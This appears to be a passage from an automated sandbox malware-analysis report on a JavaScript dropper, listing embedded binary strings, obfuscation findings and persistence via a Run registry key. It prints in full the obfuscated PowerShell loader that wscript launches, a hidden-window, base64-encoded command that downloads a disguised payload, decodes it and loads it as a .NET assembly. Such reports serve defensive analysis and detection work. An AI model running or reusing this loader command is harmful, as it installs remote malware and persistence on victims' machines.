              Source: Binary string: dnlib.dotnet.mdrawassemblyrefrowdnlib.dotnet.writermethodbodychunksmicrosoft.win32.taskschedulernetworksettingsmicrosoft.win32.taskschedulertaskschedulersnapshotcronfieldtypesystem.runtime.compilerservicesisreadonlyattributednlib.dotnet.mdrawtypespecrowdnlib.dotnetfielddefuserdnlib.dotnetinterfacemarshaltypednlib.dotnet.writermetadataflagsdnlib.dotnet.mdrawfieldlayoutrowmicrosoft.win32.taskschedulertaskdnlib.dotnet.writermetadataoptionsdnlib.dotnetimdtokenproviderdnlib.dotnetsignatureequalitycomparermicrosoft.win32.taskschedulerquicktriggertypednlib.dotnetifullnamecreatorhelperdnlib.dotnet.resourcesresourceelementdnlib.dotnetmodulecreationoptionsdnlib.dotnet.emitiinstructionoperandresolverdnlib.utilslazylist`1dnlib.dotnetpropertyattributesdnlib.dotnet.mdrawmethodrowdnlib.dotnet.mdrawassemblyrowdnlib.threadingexecutelockeddelegate`3dnlib.dotnetmoduledefmddnlib.ioiimagestreamdnlib.dotnetclasssigdnlib.dotnetstrongnamesignerdnlib.dotnetinvalidkeyexceptionelemequalitycomparerdnlib.dotnet.mdrawpropertyptrrowdnlib.threadinglistiteratealldelegate`1microsoft.win32.taskscheduler.fluentbasebuilderdnlib.dotnet.mdheapstreamdnlib.pepeimagednlib.dotnetitypedeffindermicrosoft.win32.taskschedulersnapshotitemdnlib.dotnetmemberrefdnlib.dotnetimemberrefresolverdnlib.dotnetconstantuserdnlib.dotnetimethoddecrypterdnlib.dotnetassemblynamecomparerdnlib.dotnetiresolutionscopednlib.dotnetsecurityattributednlib.dotnet.writerpeheadersoptionsdnlib.dotnet.writerioffsetheap`1dnlib.dotnetimethoddnlib.dotnetcorlibtypesdnlib.dotnet.writertablesheapdnlib.dotnet.emitopcodetypednlib.dotnetiassemblyresolverdnlib.dotnetassemblyattributesdnlib.dotneticustomattributetypednlib.dotnetdummyloggerdnlib.dotnet.mdrawfieldptrrowdnlib.dotnetiloggermicrosoft.win32.taskschedulerdailytriggerdnlib.dotnettyperefuserdnlib.dotnet.writerdummymodulewriterlistenerdnlib.dotnetassemblyhashalgorithmdnlib.dotnet.pdbpdbdocumentdnlib.dotnetpinvokeattributesdnlib.dotnetivariablednlib.dotnetresourcednlib.dotnet.writerchunklist`1dnlib.dotnetiistypeormethodmicrosoft.win32.taskschedulercustomtriggerdnlib.dotnet.writerstartupstubdnlib.dotnetgenericinstmethodsigdnlib.dotnetmemberrefuserdnlib.dotnet.mdcomimageflagsdnlib.dotnetgenericparamdnlib.dotnet.writerchunklistbase`1dnlib.utilsextensionsdnlib.dotnetnativetypednlib.dotnet.mdrawenclogrowdnlib.dotnetgenericparamcontextdnlib.peimageoptionalheader64dnlib.dotnet.mdrawnestedclassrowdnlib.dotnetextensionsdnlib.dotneteventdefdnlib.dotnet.emitlocaldnlib.dotneticontainsgenericparameterdnlib.dotnetitokenoperanddnlib.dotnet.writerimdtablednlib.pedllcharacteristicsdnlib.dotnetifullnamednlib.dotnet.resourcesresourcereaderdnlib.dotnetstrongnamepublickeydnlib.dotnet.mdrawassemblyprocessorrowdnlib.dotnetbytearrayequalitycomparerdnlib.dotnet.mdrawmethodsemanticsrowdnlib.ioiimagestreamcreatordnlib.dotnetvtablefixups source: powershell.exe, 00000002.00000002.1359529305.00007FFC3DCE4000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: `5dnlib.dotnetdeclsecuritydnlib.dotnet.writermdtablewriterdnlib.dotnetparamdefuserdnlib.dotnetframeworkredirectdnlib.dotnet.mdguidstreamdnlib.dotnet.writernativemodulewriteroptionsmemorymappedionotsupportedexceptiondnlib.dotnetmemberfindermicrosoft.win32.taskschedulertaskeventwatchermicrosoft.win32.taskschedulermonthsoftheyeardnlib.dotnetgenericinstsigmicrosoft.win32.taskschedulertaskservicednlib.dotnet.pdbsymbolwritercreatordnlib.dotnetihasconstantdnlib.peimagefileheaderdnlib.dotnetmethodsemanticsattributesdnlib.dotnetfileattributesdnlib.dotnetityperesolverdnlib.dotnetimplmapuserdnlib.dotnetmdtokensystem.runtime.compilerservicesextensionattributednlib.dotnet.writerichunkdnlib.dotnetmethodattributesdnlib.dotnet.writeriwritererrordnlib.dotnet.resourcesuserresourcedatadnlib.dotnetnullresolverdnlib.dotnet.writerstringsheapdnlib.dotnet.writerpeheadersdnlib.dotnetimplmapdnlib.dotnet.pdb.dssisymunmanageddocumentwriterdnlib.dotnet.mdheaptypednlib.dotnetidnlibdefdnlib.dotnetcustomattributemicrosoft.win32.taskscheduler.fluentactionbuilderdnlib.dotnet.mdrawmemberrefrowdnlib.utilsmfunc`3dnlib.dotnet.mdrawexportedtyperowdnlib.dotnet.writermethodbodywriterbasednlib.dotnetgenericvardnlib.dotnetimemberrefparentdnlib.dotnetiownermodulednlib.dotnetpropertysigbioscharacteristicsmicrosoft.win32.taskscheduleritriggerdelaydnlib.dotnet.mdrawfieldmarshalrow source: powershell.exe, 00000002.00000002.1359529305.00007FFC3DCE4000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: dnlib.dotnet.pdb.dss source: powershell.exe, 00000002.00000002.1359529305.00007FFC3DCE4000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: D:\Hacking\Programas\UAC\UAC\UAC\obj\Debug\UAC.pdb source: powershell.exe, 00000002.00000002.1352353205.0000013DAC470000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.1313016368.0000013DA4D4C000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.get_Current source: powershell.exe, 00000002.00000002.1352353205.0000013DAC470000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.1313016368.0000013DA4D4C000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: D:\Hacking\Programas\UAC\UAC\UAC\obj\Debug\UAC.pdbk= source: powershell.exe, 00000002.00000002.1352353205.0000013DAC470000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.1313016368.0000013DA4D4C000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: microsoft.win32.taskscheduleritaskhandlerdnlib.dotnet.writermethodbodydnlib.dotnet.resourcesresourcereaderexceptiondnlib.dotnet.writeritokencreatordnlib.peiimageoptionalheaderdnlib.peimagedatadirectorymicrosoft.win32.taskschedulertaskinstancespolicydnlib.dotnet.mdmdheaderruntimeversiondnlib.dotnet.emitlocallistdnlib.dotnet.emitexceptionhandlerdnlib.dotnet.writercor20headeroptionsdnlib.w32resourceswin32resourcespednlib.dotnet.mdrawdeclsecurityrowmicrosoft.win32.taskschedulericalendartriggermicrosoft.win32.taskschedulertaskeventargsdnlib.dotnet.writerimetadatalistenerdnlib.dotnetimportresolverdnlib.dotnetloggereventdnlib.dotnet.pdbpdbscopednlib.peimageoptionalheader32dnlib.dotnet.mdimetadatadnlib.dotnet.writerimodulewriterlistenerdnlib.dotnet.emitoperandtypednlib.dotnet.writermetadataeventeventfilterdnlib.dotnet.writermetadatadnlib.dotnetpublickeytokendnlib.dotnet.pdbisymbolwriter2dnlib.dotnetassemblydefuserdnlib.dotnetdeclsecurityusermicrosoft.win32.taskschedulerresourcereferencevaluednlib.dotnetassemblynameinfodnlib.dotnetmanifestresourceuserdnlib.dotnetaccesscheckermicrosoft.win32.taskschedulertasksetsecurityoptionsdnlib.dotnet.resourcesresourcewriterdnlib.dotnetmodulekinddnlib.peirvafileoffsetconverterdnlib.dotnetpropertydefusermicrosoft.win32.taskschedulertimetriggerdnlib.dotnetassemblyrefusermicrosoft.win32.taskschedulerwildcarddnlib.dotnetmethodspecmicrosoft.win32.taskschedulertaskeventlogmicrosoft.win32.taskschedulertasksessionstatechangetypednlib.dotnetmethodequalitycomparerdnlib.dotnetcustommarshaltypednlib.dotnetpropertydefmicrosoft.win32.taskscheduleridletriggerdnlib.dotnet.pdbpdbwriterdnlib.dotnettypedefuserdnlib.dotnet.emitstackbehaviourdnlib.dotnet.resourcesbuiltinresourcedatadnlib.dotnettypespecuserdnlib.dotnetfixedsysstringmarshaltypemicrosoft.win32.taskschedulertaskactiontypemicrosoft.win32.taskschedulerrepetitionpattern source: powershell.exe, 00000002.00000002.1359529305.00007FFC3DCE4000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: dnlib.dotnet.pdb.managed source: powershell.exe, 00000002.00000002.1359529305.00007FFC3DCE4000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: microsoft.win32.taskschedulertasklogontypednlib.dotnet.pdb.dsssymbolreadercreator source: powershell.exe, 00000002.00000002.1359529305.00007FFC3DCE4000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb source: powershell.exe, 00000002.00000002.1352353205.0000013DAC470000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.1313016368.0000013DA4D4C000.00000004.00000800.00020000.00000000.sdmp

              Data Obfuscation

              barindex
              Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: CreateTextFile("Z:\syscalls\5357.js.csv");IWshShell3._00000000();ITextStream.WriteLine(" entry:398395 o: f:Run a0:%22powershell%20-nop%20-w%20hidden%20-c%20%22%24embolic%20%3D%20'JABjAGgAbwBuAGQAcgBvAHMAdABvAG0AYQAgAD0AIAAnACYAZQA1ADUAMQA0ADUAMQA1AGQAOQA3ADUAOABlAGEAZgBhAGIAMQAwADIANgAzAGQAYwA1ADYAOAA1ADcAZgAxAD");IWshShell3.Run("powershell -nop -w hidden -c "$embolic = 'JABjAGgAbwBuAGQAcgBvAHMAdABvAG0A", "0", "false")
              Source: 2.2.powershell.exe.13d95f2fb50.0.raw.unpack, Packet.cs.Net Code: Plugins System.AppDomain.Load(byte[])
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -w hidden -c "$embolic = 'JABjAGgAbwBuAGQAcgBvAHMAdABvAG0AYQAgAD0AIAAnACYAZQA1ADUAMQA0ADUAMQA1AGQAOQA3ADUAOABlAGEAZgBhAGIAMQAwADIANgAzAGQAYwA1ADYAOAA1ADcAZgAxADcAZQA4ADgAMgAwAGQAOQA0ADAAMQBkAGYAYQA2ADMAOQA5ADQANQA2AGUANAA1AGUAMgBjADIANAAwAGIAZAA9AG0AaAAmADEAZgAxADAAYgAwADgANgA9AHMAaQAmADEANwAzADUAYwAwADgANgA9AHgAZQA/ACMAeAAjAC4AZQBsAGkARgBkAGUAIwByAGUAdgBuAG8AQwAvADMAOAA2ADUAMwAyADIAMwAyADcAOAA5ADYAOAA5ADQANgAzADEALwA1ADUAMgAxADcANQAwADUAMQA2ADkANQA2ADEAMQA0ADUAMwAxAC8AcwAjAG4AZQBtAGgAYwBhACMAIwBhAC8AbQBvAGMALgBwAHAAYQBkAHIAbwBjAHMAaQBkAC4AbgBkAGMALwAvADoAcwBwACMAIwBoACcAOwAkAHAAcgBlAHMAYwByAGkAYgBpAG4AZwAgAD0AIAAkAGMAaABvAG4AZAByAG8AcwB0AG8AbQBhACAALQByAGUAcABsAGEAYwBlACAAJwAjACcALAAgACcAdAAnADsAJABwAHkAcgBvAGcAbgBvAHMAdABpAGMAcwAgAD0AIAAnAGgAdAB0AHAAcwA6AC8ALwBhAHIAYwBoAGkAdgBlAC4AbwByAGcALwBkAG8AdwBuAGwAbwBhAGQALwBuAGUAdwBfAGkAbQBhAGcAZQBfADIAMAAyADUAMAA0ADEAMwAvAG4AZQB3AF8AaQBtAGEAZwBlAC4AagBwAGcAJwA7ACQAbQBlAHIAYwBoAGEAbgB0AGUAcgAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsAJABtAGUAcgBjAGgAYQBuAHQAZQByAC4ASABlAGEAZABlAHIAcwAuAEEAZABkACgAJwBVAHMAZQByAC0AQQBnAGUAbgB0ACcALAAnAE0AbwB6AGkAbABsAGEALwA1AC4AMAAnACkAOwAkAGgAYQBsAHQAZQByAGkAYQAgAD0AIAAkAG0AZQByAGMAaABhAG4AdABlAHIALgBEAG8AdwBuAGwAbwBhAGQARABhAHQAYQAoACQAcAB5AHIAbwBnAG4AbwBzAHQAaQBjAHMAKQA7ACQAYwBhAHIAcABlAHQAYgBhAGcAZwBpAG4AZwAgAD0AIABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAGgAYQBsAHQAZQByAGkAYQApADsAJAByAGgAYQBiAGQAbwBtAGEAbgB0AGkAcwB0ACAAPQAgACcAPAA8AEIAQQBTAEUANgA0AF8AUwBUAEEAUgBUAD4APgAnADsAJABmAHIAdQBpAHQAZQByAGUAcgBzACAAPQAgACcAPAA8AEIAQQBTAEUANgA0AF8ARQBOAEQAPgA+ACcAOwAkAG8AdgBlAHIAZgBsAGkAZwBoAHQAcwAgAD0AIAAkAGMAYQByAHAAZQB0AGIAYQBnAGcAaQBuAGcALgBJAG4AZABlAHgATwBmACgAJAByAGgAYQBiAGQAbwBtAGEAbgB0AGkAcwB0ACkAOwAkAHAAbABlAG8AbQBhAHoAaQBhACAAPQAgACQAYwBhAHIAcABlAHQAYgBhAGcAZwBpAG4AZwAuAEkAbgBkAGUAeABPAGYAKAAkAGYAcgB1AGkAdABlAHIAZQByAHMAKQA7ACQAbwB2AGUAcgBmAGwAaQBnAGgAdABzACAALQBnAGUAIAAwACAALQBhAG4AZAAgACQAcABsAGUAbwBtAGEAegBpAGEAIAAtAGcAdAAgACQAbwB2AGUAcgBmAGwAaQBnAGgAdABzADsAJABvAHYAZQByAGYAbABpAGcAaAB0AHMAIAArAD0AIAAkAHIAaABhAGIAZABvAG0AYQBuAHQAaQBzAHQALgBMAGUAbgBnAHQAaAA7ACQAQgB1AHgAdQBzACAAPQAgACQAcABsAGUAbwBtAGEAegBpAGEAIAAtACAAJABvAHYAZQByAGYAbABpAGcAaAB0AHMAOwAkAGIAbABpAG4AZwB5ACAAPQAgACQAYwBhAHIAcABlAHQAYgBhAGcAZwBpAG4AZwAuAFMAdQBiAHMAdAByAGkAbgBnACgAJABvAHYAZQByAGYAbABpAGcAaAB0AHMALAAgACQAQgB1AHgAdQBzACkAOwAkAFQAaQB0AGEAbgBpAGEAbgAgAD0AIABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABiAGwAaQBuAGcAeQApADsAJABtAGUAbAB0AGkAZQByACAAPQAgAFsAUwB5AHMAdABlAG0ALgBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AEwAbwBhAGQAKAAkAFQAaQB0AGEAbgBpAGEAbgApADsAJAByAG8AcwB0AHIAYQB0AHUAbABhACAAPQAgAFsAZABuAGwAaQBiAC4ASQBPAC4ASABvAG0AZQBdAC4ARwBlAHQATQBlAHQAaABvAGQAKAAnAFYAQQBJACcAKQAuAEkAbgB2AG8AawB
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -w hidden -c "$embolic = 'JABjAGgAbwBuAGQAcgBvAHMAdABvAG0AYQAgAD0AIAAnACYAZQA1ADUAMQA0ADUAMQA1AGQAOQA3ADUAOABlAGEAZgBhAGIAMQAwADIANgAzAGQAYwA1ADYAOAA1ADcAZgAxADcAZQA4ADgAMgAwAGQAOQA0ADAAMQBkAGYAYQA2ADMAOQA5ADQANQA2AGUANAA1AGUAMgBjADIANAAwAGIAZAA9AG0AaAAmADEAZgAxADAAYgAwADgANgA9AHMAaQAmADEANwAzADUAYwAwADgANgA9AHgAZQA/ACMAeAAjAC4AZQBsAGkARgBkAGUAIwByAGUAdgBuAG8AQwAvADMAOAA2ADUAMwAyADIAMwAyADcAOAA5ADYAOAA5ADQANgAzADEALwA1ADUAMgAxADcANQAwADUAMQA2ADkANQA2ADEAMQA0ADUAMwAxAC8AcwAjAG4AZQBtAGgAYwBhACMAIwBhAC8AbQBvAGMALgBwAHAAYQBkAHIAbwBjAHMAaQBkAC4AbgBkAGMALwAvADoAcwBwACMAIwBoACcAOwAkAHAAcgBlAHMAYwByAGkAYgBpAG4AZwAgAD0AIAAkAGMAaABvAG4AZAByAG8AcwB0AG8AbQBhACAALQByAGUAcABsAGEAYwBlACAAJwAjACcALAAgACcAdAAnADsAJABwAHkAcgBvAGcAbgBvAHMAdABpAGMAcwAgAD0AIAAnAGgAdAB0AHAAcwA6AC8ALwBhAHIAYwBoAGkAdgBlAC4AbwByAGcALwBkAG8AdwBuAGwAbwBhAGQALwBuAGUAdwBfAGkAbQBhAGcAZQBfADIAMAAyADUAMAA0ADEAMwAvAG4AZQB3AF8AaQBtAGEAZwBlAC4AagBwAGcAJwA7ACQAbQBlAHIAYwBoAGEAbgB0AGUAcgAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsAJABtAGUAcgBjAGgAYQBuAHQAZQByAC4ASABlAGEAZABlAHIAcwAuAEEAZABkACgAJwBVAHMAZQByAC0AQQBnAGUAbgB0ACcALAAnAE0AbwB6AGkAbABsAGEALwA1AC4AMAAnACkAOwAkAGgAYQBsAHQAZQByAGkAYQAgAD0AIAAkAG0AZQByAGMAaABhAG4AdABlAHIALgBEAG8AdwBuAGwAbwBhAGQARABhAHQAYQAoACQAcAB5AHIAbwBnAG4AbwBzAHQAaQBjAHMAKQA7ACQAYwBhAHIAcABlAHQAYgBhAGcAZwBpAG4AZwAgAD0AIABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAGgAYQBsAHQAZQByAGkAYQApADsAJAByAGgAYQBiAGQAbwBtAGEAbgB0AGkAcwB0ACAAPQAgACcAPAA8AEIAQQBTAEUANgA0AF8AUwBUAEEAUgBUAD4APgAnADsAJABmAHIAdQBpAHQAZQByAGUAcgBzACAAPQAgACcAPAA8AEIAQQBTAEUANgA0AF8ARQBOAEQAPgA+ACcAOwAkAG8AdgBlAHIAZgBsAGkAZwBoAHQAcwAgAD0AIAAkAGMAYQByAHAAZQB0AGIAYQBnAGcAaQBuAGcALgBJAG4AZABlAHgATwBmACgAJAByAGgAYQBiAGQAbwBtAGEAbgB0AGkAcwB0ACkAOwAkAHAAbABlAG8AbQBhAHoAaQBhACAAPQAgACQAYwBhAHIAcABlAHQAYgBhAGcAZwBpAG4AZwAuAEkAbgBkAGUAeABPAGYAKAAkAGYAcgB1AGkAdABlAHIAZQByAHMAKQA7ACQAbwB2AGUAcgBmAGwAaQBnAGgAdABzACAALQBnAGUAIAAwACAALQBhAG4AZAAgACQAcABsAGUAbwBtAGEAegBpAGEAIAAtAGcAdAAgACQAbwB2AGUAcgBmAGwAaQBnAGgAdABzADsAJABvAHYAZQByAGYAbABpAGcAaAB0AHMAIAArAD0AIAAkAHIAaABhAGIAZABvAG0AYQBuAHQAaQBzAHQALgBMAGUAbgBnAHQAaAA7ACQAQgB1AHgAdQBzACAAPQAgACQAcABsAGUAbwBtAGEAegBpAGEAIAAtACAAJABvAHYAZQByAGYAbABpAGcAaAB0AHMAOwAkAGIAbABpAG4AZwB5ACAAPQAgACQAYwBhAHIAcABlAHQAYgBhAGcAZwBpAG4AZwAuAFMAdQBiAHMAdAByAGkAbgBnACgAJABvAHYAZQByAGYAbABpAGcAaAB0AHMALAAgACQAQgB1AHgAdQBzACkAOwAkAFQAaQB0AGEAbgBpAGEAbgAgAD0AIABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABiAGwAaQBuAGcAeQApADsAJABtAGUAbAB0AGkAZQByACAAPQAgAFsAUwB5AHMAdABlAG0ALgBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AEwAbwBhAGQAKAAkAFQAaQB0AGEAbgBpAGEAbgApADsAJAByAG8AcwB0AHIAYQB0AHUAbABhACAAPQAgAFsAZABuAGwAaQBiAC4ASQBPAC4ASABvAG0AZQBdAC4ARwBlAHQATQBlAHQAaABvAGQAKAAnAFYAQQBJACcAKQAuAEkAbgB2AG8AawBJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFC3DAA0A28 push ecx; iretd 2_2_00007FFC3DAA0A46
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFC3DAA6241 push eax; retf 2_2_00007FFC3DAA6291
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFC3DAA018D push ds; iretd 2_2_00007FFC3DAA01B6
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFC3DAA0987 push E95AF9D0h; ret 2_2_00007FFC3DAA09C9
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFC3DAA5964 pushad ; ret 2_2_00007FFC3DAA5969
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFC3DAA7563 push ebx; iretd 2_2_00007FFC3DAA756A
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFC3DAA00ED push ds; iretd 2_2_00007FFC3DAA01B6
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFC3DAA00BD pushad ; iretd 2_2_00007FFC3DAA00C1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFC3DAA3C53 push ds; retf 2_2_00007FFC3DAA3CB2
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFC3DAA0327 pushad ; iretd 2_2_00007FFC3DAA0346
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFC3DAA635D pushad ; iretd 2_2_00007FFC3DAA6391
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFC3DAA0347 push esi; iretd 2_2_00007FFC3DAA0376
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFC3DAA6292 push eax; retf 2_2_00007FFC3DAA6291
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFC3DAA6292 pushad ; iretd 2_2_00007FFC3DAA6391

              Boot Survival

              barindex
              Source: Yara matchFile source: 11.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.powershell.exe.13d95f2fb50.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.powershell.exe.13d95f2fb50.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0000000B.00000002.2427138084.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000002.1288245604.0000013D95F29000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7776, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: MSBuild.exe PID: 5716, type: MEMORYSTR
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Path C:\Users\Public\Downloads\fluctuous.jsJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run PathJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run PathJump to behavior
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
